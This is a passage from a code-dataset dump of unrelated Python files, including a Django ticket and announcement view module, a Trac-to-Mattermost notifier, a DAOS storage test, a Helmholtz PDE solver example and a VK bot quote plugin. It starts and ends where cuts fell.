t2.join()\n print('')\n print(\"已全部读写完毕\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1-进程间通信-Queue.py","file_name":"1-进程间通信-Queue.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135735587","text":"from typing import Tuple, List\n\ndef main()->None:\n # ヒント見たけど参考にしてない\n N, x = map(int, input().split())\n a:List[int] = list(map(int, input().split()))\n sorted_a:List[int] = sorted(a) # 小さい順にならべる\n count:int = 0 # 何回配ったか\n for d in sorted_a:\n x -= d\n if x < 0: # 持ってた量が配る総量より少なかった時\n break\n count += 1\n # ちょうど配れない、必要な量より多く持ってた時はおおもらう人が出てくる。\n # 幸福人数の最大を求めればいいから余りを全部一人にあげればいいから−1\n if x > 0:\n print(count-1)\n else: # ちょうどの時はcount=N,持ってた量が配る総量より少なかった時は配れた人数\n print(count)\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/ABC_50/ABC_027/A_CandyDistributionAgain 2.py","file_name":"A_CandyDistributionAgain 2.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497151403","text":"import dataset_generator as dataset\nimport numpy as np\nimport os\n\n\nclass pipeline2:\n\n\tdef __init__(self, cut_classifier, ocr_classifier, classes=dataset.ALPHABET_ALL ):\n\t\tself._classes = classes\n\t\tself._cut_classifier = cut_classifier\n\t\tself._ocr_net = ocr_classifier\n\n\n\t# Return a list of tuples where the index i of the list represent the prediction\n\t# for the i-th value. Each tuple contains a boolean, True if is a good cut False otherwise,\n\t# and contains a list that is the ranking of the prediction for each letter. \n\t# es: [(False, []), (True, [(\"s_alta\",90%),(\"a\", 10%),...(\"z\", 0%)])]\n\tdef predict(self, X_test, verbose=0):\n\t\tprediction_cuts = self._cut_classifier.predict(X_test, verbose=verbose)\n\n\t\tindex_good_letters = []\n\n\t\tfor i,(_,prob_letter) in enumerate(prediction_cuts):\n\t\t\tif prob_letter>=0.5:\n\t\t\t\tindex_good_letters.append(i)\n\n\t\tX_test = np.array(X_test)\n\t\tX_test_ocr = X_test[index_good_letters]\n\t\tprediction_ocr = self._ocr_net.predict(X_test_ocr)\n\n\t\tprediction = []\n\n\t\tocr_i = 0;\n\n\t\tfor i,_ in enumerate(X_test):\n\t\t\tif not i in index_good_letters:\n\t\t\t\tprediction.append((False, []))\n\t\t\telse:\n\t\t\t\tsorted_indexes = (-prediction_ocr[ocr_i]).argsort()[:3]\n\t\t\t\tranking = [(self._classes[j], prediction_ocr[ocr_i][j]*100) for j in sorted_indexes]\n\t\t\t\tdt = np.dtype([('letters', np.str_, 16), ('grades', np.float64)])\n\t\t\t\tranking = np.array(ranking, dtype=dt)\n\t\t\t\tprediction.append((True, ranking))\n\t\t\t\tocr_i += 1\n\n\t\treturn prediction\n\n\n\n\n\n\n","sub_path":"Notebooks/pipeline2.py","file_name":"pipeline2.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522507018","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom django.template import loader\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils import timezone\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom .models import Profile, Ticket, Competition\nfrom .forms import ProfileEditForm, NameChangeForm\nfrom competition.models import Participant\nimport logging\n\ng_logger = logging.getLogger(__name__)\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n user_form = NameChangeForm(request.POST, instance=request.user)\n profile_form = ProfileEditForm(request.POST, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n # messages.success(request, _('Your profile was successfully updated!'))\n return redirect('member:profile')\n # else:\n # messages.error(request, _('Please correct the error below.'))\n else:\n user_form = NameChangeForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n\n template = loader.get_template('profile.html')\n current_site = get_current_site(request)\n context = {\n 'profile': request.user.profile,\n 'site_name': current_site.name,\n 'user_form': user_form,\n 'profile_form': profile_form,\n }\n return HttpResponse(template.render(context, request))\n\n\n@login_required\ndef use_token(request):\n if request.method == 'POST':\n try:\n token = request.POST['token'].upper()\n ticket = Ticket.objects.get(used=False, token=token)\n ticket.used = True\n g_logger.debug(\"Found ticket for token:%s\" % token)\n tourn = ticket.competition.tournament\n try:\n participant = Participant.objects.get(user=request.user,\n tournament=tourn)\n except Participant.DoesNotExist:\n participant = Participant(user=request.user,\n tournament=tourn)\n participant.save()\n ticket.competition.participants.add(participant)\n ticket.save()\n return redirect('competition:org_table',\n tour_name=tourn.name,\n org_name=ticket.competition.organisation.name)\n except Exception:\n g_logger.exception(\"Failed to process token\")\n\n template = loader.get_template('token.html')\n current_site = get_current_site(request)\n context = {\n 'site_name': current_site.name,\n }\n return HttpResponse(template.render(context, request))\n\n\n@user_passes_test(lambda user: user.is_superuser)\ndef announcement(request):\n current_site = get_current_site(request)\n if request.method == 'POST':\n subject = \"\"\n body = \"\"\n try:\n subject = request.POST[\"subject\"]\n body = request.POST[\"message\"]\n test_flag = request.POST[\"test_email\"] == \"true\"\n except KeyError:\n test_flag = False\n\n if not len(body) or not len(subject):\n raise Http404(\"Subject or body missing\")\n\n if test_flag:\n user_list = [request.user]\n else:\n user_list = User.objects.all()\n\n sent_to = 0\n for user in user_list:\n message = loader.render_to_string('announcement_email.html', {\n 'user': user,\n 'body': body,\n 'site_name': current_site.name,\n 'site_domain': current_site.name,\n 'protocol': 'https' if request.is_secure() else 'http',\n })\n if user.profile.email_user(subject, message):\n sent_to += 1\n\n template = loader.get_template('announcement_sent.html')\n context = {\n 'site_name': current_site.name,\n 'user_list_len': sent_to,\n }\n\n return HttpResponse(template.render(context, request))\n\n template = loader.get_template('announcement.html')\n context = {\n 'site_name': current_site.name,\n }\n\n return HttpResponse(template.render(context, request))\n\n\n@permission_required('competition.change_match')\ndef print_tickets(request, comp_pk):\n current_site = get_current_site(request)\n\n comp = get_object_or_404(Competition, pk=comp_pk)\n\n tickets = comp.ticket_set.filter(used=False)\n\n if not tickets:\n raise Http404(\"Competition has no tickets\")\n\n template = loader.get_template('tickets.html')\n context = {\n 'site_name': current_site.name,\n 'comp': comp,\n 'tickets': tickets,\n }\n\n return HttpResponse(template.render(context, request))\n","sub_path":"member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297944033","text":"# Copyright (c) 2015-2016 Truveris, Inc. All Rights Reserved.\n# See included LICENSE file.\n\nfrom trac.core import Component\nfrom trac.core import implements\nfrom trac.wiki.api import IWikiChangeListener\n\nfrom base import TracMattermostComponent\n\n\nclass WikiNotifications(Component, TracMattermostComponent):\n\n implements(IWikiChangeListener)\n\n def format_page(self, page, version=None):\n fmt = u\"[{name}]({link})\"\n if version:\n fmt = fmt + \" [v{version}]({difflink})\"\n\n return fmt.format(\n name=page.name,\n version=version,\n link=self.env.abs_href.wiki(page.name),\n difflink=self.env.abs_href.wiki(page.name, {\n \"action\": \"diff\",\n \"version\": version,\n }),\n )\n\n def wiki_page_added(self, page):\n fmt = u\"@{author} created {page}\"\n text = fmt.format(\n author=page.author,\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_changed(self, page, version, t, comment, author, ipnr):\n fmt = u\"@{author} edited {page}\"\n if comment:\n fmt = fmt + \": {comment}\"\n text = fmt.format(\n author=author,\n page=self.format_page(page, version),\n comment=comment,\n )\n self.send_notification(text)\n\n def wiki_page_deleted(self, page):\n fmt = u\"{page} was deleted\"\n text = fmt.format(\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_version_deleted(self, page):\n fmt = u\"a version of {page} was deleted\"\n text = fmt.format(\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_renamed(self, page, old_name):\n fmt = u\"{old_name} was renamed to {page}\"\n text = fmt.format(\n old_name=old_name,\n page=self.format_page(page),\n )\n self.send_notification(text)\n","sub_path":"trac_mattermost/wiki_notifications.py","file_name":"wiki_notifications.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150014016","text":"#!/usr/bin/python\n\"\"\"\n (C) Copyright 2020-2021 Intel Corporation.\n\n SPDX-License-Identifier: BSD-2-Clause-Patent\n\"\"\"\nimport random\nimport threading\nfrom osa_utils import OSAUtils\nfrom test_utils_pool import TestPool\nfrom write_host_file import write_host_file\nfrom apricot import skipForTicket\n\ntry:\n # python 3.x\n import queue as queue\nexcept ImportError:\n # python 2.7\n import Queue as queue\n\nclass OSAOfflineReintegration(OSAUtils):\n # pylint: disable=too-many-ancestors\n \"\"\"\n Test Class Description: This test runs\n daos_server offline reintegration test cases.\n\n :avocado: recursive\n \"\"\"\n def setUp(self):\n \"\"\"Set up for test case.\"\"\"\n super(OSAOfflineReintegration, self).setUp()\n self.dmg_command = self.get_dmg_command()\n self.ior_w_flags = self.params.get(\"write_flags\", '/run/ior/iorflags/*')\n self.ior_r_flags = self.params.get(\"read_flags\", '/run/ior/iorflags/*')\n self.ior_apis = self.params.get(\"ior_api\", '/run/ior/iorflags/*')\n self.ior_test_sequence = self.params.get(\n \"ior_test_sequence\", '/run/ior/iorflags/*')\n self.ior_dfs_oclass = self.params.get(\n \"obj_class\", '/run/ior/iorflags/*')\n # Recreate the client hostfile without slots defined\n self.hostfile_clients = write_host_file(\n self.hostlist_clients, self.workdir, None)\n self.out_queue = queue.Queue()\n\n def run_ior_thread(self, action, oclass, api, test):\n \"\"\"Start the IOR thread for either writing or\n reading data to/from a container.\n Args:\n action (str): Start the IOR thread with Read or\n Write\n oclass (str): IOR object class\n API (str): IOR API\n test (list): IOR test sequence\n flags (str): IOR flags\n \"\"\"\n if action == \"Write\":\n flags = self.ior_w_flags\n else:\n flags = self.ior_r_flags\n\n # Add a thread for these IOR arguments\n process = threading.Thread(target=self.ior_thread,\n kwargs={\"pool\": self.pool,\n \"oclass\": oclass,\n \"api\": api,\n \"test\": test,\n \"flags\": flags,\n \"results\":\n self.out_queue})\n # Launch the IOR thread\n process.start()\n # Wait for the thread to finish\n process.join()\n\n\n def run_offline_reintegration_test(self, num_pool, data=False,\n server_boot=False):\n \"\"\"Run the offline reintegration without data.\n Args:\n num_pool (int) : total pools to create for testing purposes.\n data (bool) : whether pool has no data or to create\n some data in pool. Defaults to False.\n server_boot (bool) : Perform system stop/start on a rank.\n Defults to False.\n \"\"\"\n # Create a pool\n pool = {}\n pool_uuid = []\n exclude_servers = (len(self.hostlist_servers) * 2) - 1\n\n # Exclude rank : two ranks other than rank 0.\n rank = random.randint(1, exclude_servers)\n\n for val in range(0, num_pool):\n pool[val] = TestPool(self.context,\n dmg_command=self.get_dmg_command())\n pool[val].get_params(self)\n # Split total SCM and NVME size for creating multiple pools.\n pool[val].scm_size.value = int(pool[val].scm_size.value /\n num_pool)\n pool[val].nvme_size.value = int(pool[val].nvme_size.value /\n num_pool)\n pool[val].create()\n pool_uuid.append(pool[val].uuid)\n self.pool = pool[val]\n if data:\n self.run_ior_thread(\"Write\", self.ior_dfs_oclass[0],\n self.ior_apis[0], self.ior_test_sequence[0])\n\n # Exclude and reintegrate the pool_uuid, rank and targets\n for val in range(0, num_pool):\n self.pool = pool[val]\n self.pool.display_pool_daos_space(\"Pool space: Beginning\")\n pver_begin = self.get_pool_version()\n self.log.info(\"Pool Version at the beginning %s\", pver_begin)\n if server_boot is False:\n output = self.dmg_command.pool_exclude(self.pool.uuid,\n rank)\n else:\n output = self.dmg_command.system_stop(ranks=rank)\n self.pool.wait_for_rebuild(True)\n self.log.info(output)\n output = self.dmg_command.system_start(ranks=rank)\n\n self.log.info(output)\n self.is_rebuild_done(3)\n self.assert_on_rebuild_failure()\n\n pver_exclude = self.get_pool_version()\n self.log.info(\"Pool Version after exclude %s\", pver_exclude)\n # Check pool version incremented after pool exclude\n # pver_exclude should be greater than\n # pver_begin + 8 targets.\n self.assertTrue(pver_exclude > (pver_begin + 8),\n \"Pool Version Error: After exclude\")\n output = self.dmg_command.pool_reintegrate(self.pool.uuid,\n rank)\n self.log.info(output)\n self.is_rebuild_done(3)\n self.assert_on_rebuild_failure()\n\n pver_reint = self.get_pool_version()\n self.log.info(\"Pool Version after reintegrate %d\", pver_reint)\n # Check pool version incremented after pool reintegrate\n self.assertTrue(pver_reint > (pver_exclude + 1),\n \"Pool Version Error: After reintegrate\")\n\n for val in range(0, num_pool):\n display_string = \"Pool{} space at the End\".format(val)\n self.pool = pool[val]\n self.pool.display_pool_daos_space(display_string)\n\n if data:\n self.run_ior_thread(\"Read\", self.ior_dfs_oclass[0],\n self.ior_apis[0], self.ior_test_sequence[0])\n\n def test_osa_offline_reintegration(self):\n \"\"\"Test ID: DAOS-4749\n Test Description: Validate Offline Reintegration\n\n :avocado: tags=all,daily_regression,hw,medium,ib2\n :avocado: tags=osa,offline_reintegration\n \"\"\"\n # Perform reintegration testing with a pool\n self.run_offline_reintegration_test(1, True)\n\n @skipForTicket(\"DAOS-6766, DAOS-6783\")\n def test_osa_offline_reintegration_server_stop(self):\n \"\"\"Test ID: DAOS-6748.\n Test Description: Validate Offline Reintegration with server stop\n :avocado: tags=all,pr,daily_regression,hw,medium,ib2,osa\n :avocado: tags=offline_reintegration_srv_stop\n \"\"\"\n self.run_offline_reintegration_test(1, data=True, server_boot=True)\n","sub_path":"src/tests/ftest/osa/osa_offline_reintegration.py","file_name":"osa_offline_reintegration.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"489895967","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pybie2d\nfrom ipde.embedded_boundary import EmbeddedBoundary\nfrom ipde.ebdy_collection import EmbeddedBoundaryCollection\nfrom ipde.heavisides import SlepianMollifier\nfrom ipde.derivatives import fd_x_4, fd_y_4, fourier\nfrom ipde.solvers.multi_boundary.modified_helmholtz import ModifiedHelmholtzSolver\nfrom qfs.two_d_qfs import QFS_Evaluator\nfrom personal_utilities.arc_length_reparametrization import arc_length_parameterize\nstar = pybie2d.misc.curve_descriptions.star\nsquish = pybie2d.misc.curve_descriptions.squished_circle\nGSB = pybie2d.boundaries.global_smooth_boundary.global_smooth_boundary.Global_Smooth_Boundary\nGrid = pybie2d.grid.Grid\nMH_Layer_Form = pybie2d.kernels.high_level.modified_helmholtz.Modified_Helmholtz_Layer_Form\nMH_Layer_Apply = pybie2d.kernels.high_level.modified_helmholtz.Modified_Helmholtz_Layer_Apply\n\nimport time\n\nnb = 800\nhelmholtz_k = 5.0\nM = 20\npad_zone = 0\nverbose = True\nplot = True\nreparametrize = True\nslepian_r = 1.5*M\nsolver_type = 'fourth' # fourth or spectral\n\n# get heaviside function\nMOL = SlepianMollifier(slepian_r)\n# construct boundary\nbdy1 = GSB(c=star(4*nb, a=0.05, r=3, f=7))\nbdy2 = GSB(c=squish(nb, x=-1.2, y=-0.7, b=0.05, rot=-np.pi/4))\nbdy3 = GSB(c=star(nb, x=1, y=0.5, a=0.2, f=3))\nif reparametrize:\n\tbdy1 = GSB(*arc_length_parameterize(bdy1.x, bdy1.y))\n\tbdy2 = GSB(*arc_length_parameterize(bdy2.x, bdy2.y))\n\tbdy3 = GSB(*arc_length_parameterize(bdy3.x, bdy3.y))\nbh1 = bdy1.dt*bdy1.speed.min()\nbh2 = bdy2.dt*bdy2.speed.min()\nbh3 = bdy3.dt*bdy3.speed.min()\nbh = min(bh1, bh2, bh3)\nif plot:\n\tfig, ax = plt.subplots()\n\tax.scatter(bdy1.x, bdy1.y, color='black')\n\tax.scatter(bdy2.x, bdy2.y, color='blue')\n\tax.scatter(bdy3.x, bdy3.y, color='red')\n# get number of gridpoints to roughly match boundary spacing\nng = 2*int(0.5*7//bh)\n# construct a grid\ngrid = Grid([-3.5, 3.5], ng, [-3.5, 3.5], ng, x_endpoints=[True, False], y_endpoints=[True, False])\n# construct embedded boundary\nbdys = [bdy1, bdy2, bdy3]\nkwa = {'pad_zone':pad_zone, 'heaviside':MOL.step, 'interpolation_scheme':'polyi'}\nebdys = [EmbeddedBoundary(bdy, bdy is bdy1, M, bh, **kwa) for bdy in bdys]\nebdyc = EmbeddedBoundaryCollection(ebdys)\n# register the grid\nprint('\\nRegistering the grid')\nebdyc.register_grid(grid, verbose=verbose)\n\n# timing for grid registration!\nfor i in range(3):\n\tst = time.time()\n\tebdys[i].register_grid(grid)\n\tprint((time.time()-st)*1000)\n\n# make some plots\nif plot:\n\tfig, ax = plt.subplots()\n\tcolors = ['black', 'blue', 'red', 'purple', 'purple']\n\tfor ebdy in ebdys:\n\t\tq = ebdy.bdy_qfs\n\t\tq1 = q.interior_source_bdy if ebdy.interior else q.exterior_source_bdy\n\t\tq = ebdy.interface_qfs\n\t\tq2 = q.interior_source_bdy\n\t\tq3 = q.exterior_source_bdy\n\t\tbbs = [ebdy.bdy, ebdy.interface, q1, q2, q3]\n\t\tfor bi, bb in enumerate(bbs):\n\t\t\tax.plot(bb.x, bb.y, color=colors[bi])\n\n################################################################################\n# Get solution, forces, BCs\n\nk = 20*np.pi/7\n\nsolution_func = lambda x, y: np.exp(np.sin(k*x))*np.sin(k*y)\nforce_func = lambda x, y: helmholtz_k**2*solution_func(x, y) - k**2*np.exp(np.sin(k*x))*np.sin(k*y)*(np.cos(k*x)**2-np.sin(k*x)-1.0)\nf = force_func(grid.xg, grid.yg)\nfrs = [force_func(ebdy.radial_x, ebdy.radial_y) for ebdy in ebdys]\nua = solution_func(grid.xg, grid.yg)\nuars = [solution_func(ebdy.radial_x, ebdy.radial_y) for ebdy in ebdys]\nbcs2v = solution_func(ebdyc.all_bvx, ebdyc.all_bvy)\nbcs2l = ebdyc.v2l(bcs2v)\n\n################################################################################\n# Setup Poisson Solver\n\nsolver = ModifiedHelmholtzSolver(ebdyc, solver_type=solver_type, k=helmholtz_k)\nue, uers = solver(f, frs, tol=1e-12, verbose=verbose)\n\nif plot:\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, ue)\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\n# this isn't correct yet because we haven't applied boundary conditions\ndef two_d_split(MAT, hsplit, vsplit):\n\tvsplits = np.vsplit(MAT, vsplit)\n\treturn [np.hsplit(vsplit, hsplit) for vsplit in vsplits]\n\nNs = [ebdy.bdy.N for ebdy in ebdyc.ebdys]\nCNs = np.cumsum(Ns)\nCN = CNs[:-1]\ntotal_N = CNs[-1]\nMAT = np.zeros([total_N, total_N], dtype=float)\nMATS = two_d_split(MAT,CN,CN)\n\nd_only = lambda src, trg: MH_Layer_Form(src, trg, ifdipole=True, k=helmholtz_k)\nc_only = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, k=helmholtz_k)\nc_and_d = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, ifdipole=True, k=helmholtz_k)\nd_singular = lambda src: src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k)\nc_singular = lambda src: src.Modified_Helmholtz_SLP_Self_Form(k=helmholtz_k)\ncd_singular = lambda src: c_singular(src) + d_singular(src)\nhalf_eye = lambda src: np.eye(src.N)*0.5\n\nMATS[0][0][:] = d_singular(bdy1) - half_eye(bdy1)\nMATS[0][1][:] = c_and_d(bdy2, bdy1)\nMATS[0][2][:] = c_and_d(bdy3, bdy1)\n\nMATS[1][0][:] = d_only(bdy1, bdy2)\nMATS[1][1][:] = cd_singular(bdy2) + half_eye(bdy2)\nMATS[1][2][:] = c_and_d(bdy3, bdy2)\n\nMATS[2][0][:] = d_only(bdy1, bdy3)\nMATS[2][1][:] = c_and_d(bdy2, bdy3)\nMATS[2][2][:] = cd_singular(bdy3) + half_eye(bdy3)\n\n# get the inhomogeneous solution on the boundary\nbvs = solver.get_boundary_values(uers)\n\n# solve for density\ntau = np.linalg.solve(MAT, bcs2v - bvs)\n\n# separate this into pieces\ntaul = ebdyc.v2l(tau)\n\n# get effective sources\nqfs_list = []\nNaive_SLP = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, k=helmholtz_k)\nfor ebdy in ebdys:\n\tif ebdy.interior:\n\t\tdef Kernel_Function(src, trg):\n\t\t\treturn src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k) - 0.5*np.eye(src.N)\n\telse:\n\t\tdef Kernel_Function(src, trg):\n\t\t\treturn src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k) + src.Modified_Helmholtz_SLP_Self_Form(k=helmholtz_k) + 0.5*np.eye(src.N)\n\tqfs = QFS_Evaluator(ebdy.bdy_qfs, ebdy.interior, [Kernel_Function,], Naive_SLP, on_surface=True, form_b2c=False)\n\tqfs_list.append(qfs)\n\n# compute sigmas\nsigmal = [qfs([tau]) for qfs, tau in zip(qfs_list, taul)]\nsigmav = np.concatenate(sigmal)\n\n# evaluate this onto all gridpoints and radial points\nout = MH_Layer_Apply(ebdyc.bdy_inward_sources, ebdyc.grid_and_radial_pts, charge=sigmav, k=helmholtz_k)\ngslp, rslpl = ebdyc.divide_grid_and_radial(out)\n\nue[ebdyc.phys] += gslp\nfor uer, rslp in zip(uers, rslpl):\n\tuer += rslp\n\nif plot:\n\tmue = np.ma.array(ue, mask=ebdyc.ext)\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, mue)\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\n# compute the error\nrerrs = [np.abs(uer - uar).max() for uer, uar in zip(uers, uars)]\ngerr = np.abs(ue - ua)\ngerrp = gerr[ebdyc.phys]\nmgerr = np.ma.array(gerr, mask=ebdyc.ext)\n\nif plot:\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, mgerr + 1e-15, norm=mpl.colors.LogNorm())\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\nprint('Error in grid: {:0.2e}'.format(gerrp.max()))\nfor ri, rerr in enumerate(rerrs):\n\tprint('Error in annulus', ri+1, 'is: {:0.2e}'.format(rerr))\n","sub_path":"examples/multi_modified_helmholtz.py","file_name":"multi_modified_helmholtz.py","file_ext":"py","file_size_in_byte":7584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492999059","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\nimport edx_rest_framework_extensions\n\n\ndef is_requirement(line):\n \"\"\"\n Return True if the requirement line is a package requirement;\n that is, it is not blank, a comment, or editable.\n \"\"\"\n # Remove whitespace at the start/end of the line\n line = line.strip()\n\n # Skip blank lines, comments, and editable installs\n return not (\n line == '' or\n line.startswith('-r') or\n line.startswith('#') or\n line.startswith('-e') or\n line.startswith('git+') or\n line.startswith('-c')\n )\n\n\ndef load_requirements(*requirements_paths):\n \"\"\"\n Load all requirements from the specified requirements files.\n Returns a list of requirement strings.\n \"\"\"\n requirements = set()\n for path in requirements_paths:\n requirements.update(\n line.strip() for line in open(path).readlines()\n if is_requirement(line)\n )\n return list(requirements)\n\n\nsetup(\n name='edx-drf-extensions',\n version=edx_rest_framework_extensions.__version__,\n description='edX extensions of Django REST Framework',\n author='edX',\n author_email='oscm@edx.org',\n url='https://github.com/edx/edx-drf-extensions',\n license='Apache 2.0',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Framework :: Django',\n 'Framework :: Django :: 2.2',\n 'Framework :: Django :: 3.0',\n 'Framework :: Django :: 3.1',\n 'Framework :: Django :: 3.2',\n ],\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=load_requirements('requirements/base.in'),\n tests_require=load_requirements('requirements/test.in'),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355987680","text":"# This file is part of the GBI project.\n# Copyright (C) 2013 Omniscale GmbH & Co. KG \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom flask import request\nfrom flask.ext.wtf import SelectField, HiddenField, TextField, validators\nfrom flask.ext.babel import lazy_gettext as _l\nfrom .base import Form\n\n\nclass WFSEditForm(Form):\n def is_submitted(self):\n return (\n request\n and request.method in (\"PUT\", \"POST\")\n and request.form.get(\"edit_form\")\n )\n\n layer = SelectField(_l(\"wfs_layer\"))\n external_editor = HiddenField()\n edit_form = HiddenField()\n\n\nclass WFSAddLayerForm(Form):\n def is_submitted(self):\n return (\n request\n and request.method in (\"PUT\", \"POST\")\n and request.form.get(\"add_form\")\n )\n\n new_layer = TextField(_l(\"wfs_new_layer_name\"), validators=[validators.Required()])\n add_form = HiddenField()\n","sub_path":"gr/gbi-server/app/gbi_server/forms/wfs.py","file_name":"wfs.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"247114158","text":"import sys\n\ndry_run = True\nif dry_run:\n file = open('res/max_mex.txt')\n sys.stdin = file\n\nglobal var\nfor t in range(int(input())):\n n, m = map(int, input().split())\n arr = [int(i) for i in input().split()]\n smaller_set = set()\n smaller_unique_sum = 0\n ms_count = 0\n for e in arr:\n if e == m:\n ms_count += 1\n continue\n if e < m:\n if e not in smaller_set:\n smaller_set.add(e)\n smaller_unique_sum += e\n if smaller_unique_sum == ((m - 1) * m) / 2:\n print(n - ms_count)\n else:\n print(-1)\n pass\n","sub_path":"codechef/cook_off/june/max_mex.py","file_name":"max_mex.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"615166673","text":"from handler.base_plugin_command import CommandPlugin\nfrom vk.helpers import upload_photo\nfrom utils import traverse\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nimport aiohttp\nimport datetime, io\n\n\nclass QuotePlugin(CommandPlugin):\n __slots__ = (\"q\", \"qf\", \"f\", \"fs\")\n\n def __init__(self, *commands, prefixes=None, strict=False):\n \"\"\"Answers with image containing stylish quote.\"\"\"\n\n super().__init__(*commands, prefixes=prefixes, strict=strict)\n\n self.q = Image.open(self.get_path(\"q.png\")).resize((40, 40), Image.LANCZOS)\n self.qf = self.q.copy().transpose(Image.FLIP_LEFT_RIGHT).transpose(Image.FLIP_TOP_BOTTOM)\n\n self.f = ImageFont.truetype(self.get_path(\"font.ttf\"), 20)\n self.fs = ImageFont.truetype(self.get_path(\"font.ttf\"), 14)\n\n example = self.command_example()\n self.description = [f\"Генератор цитат\",\n f\"{example} [титул] - перешлите сообщение и укажите титул (по желанию) и \"\n \"получите цитату!\"]\n\n async def process_message(self, msg):\n command, otext = self.parse_message(msg)\n\n i, url, name, last_name = None, None, None, None\n\n for m in traverse(await msg.get_full_forwarded()):\n if m.full_text:\n if i == m.true_user_id:\n text += \"\\n\" + m.full_text\n continue\n elif i is not None:\n break\n\n i = m.true_user_id\n\n u = await self.api.users.get(user_ids=i, fields=\"photo_max\")\n if not u: continue\n u = u[0]\n\n url = u[\"photo_max\"]\n name = u[\"first_name\"]\n last_name = u[\"last_name\"]\n\n text = m.full_text\n else:\n if i is None:\n return await msg.answer(\"Нечего цитировать!\")\n\n async with aiohttp.ClientSession() as sess:\n async with sess.get(url) as response:\n img = Image.open(io.BytesIO(await response.read()))\n img = img.resize((200, 200))\n\n rsize = (700, 400)\n res = Image.new(\"RGBA\", rsize, color=(0, 0, 0))\n res.paste(img, (25, 100))\n\n tex = Image.new(\"RGBA\", rsize, color=(0, 0, 0))\n\n draw = ImageDraw.Draw(tex)\n\n sidth = draw.textsize(\" \", font=self.f)[0]\n seight = int(draw.textsize(\"I\", font=self.f)[1] * 1.05)\n\n text = text.splitlines()\n\n midth = 0\n width = 0\n height = 0\n for line in text:\n for word in line.split(\" \"):\n size = draw.textsize(word, font=self.f)\n\n if width + size[0] >= rsize[0] - 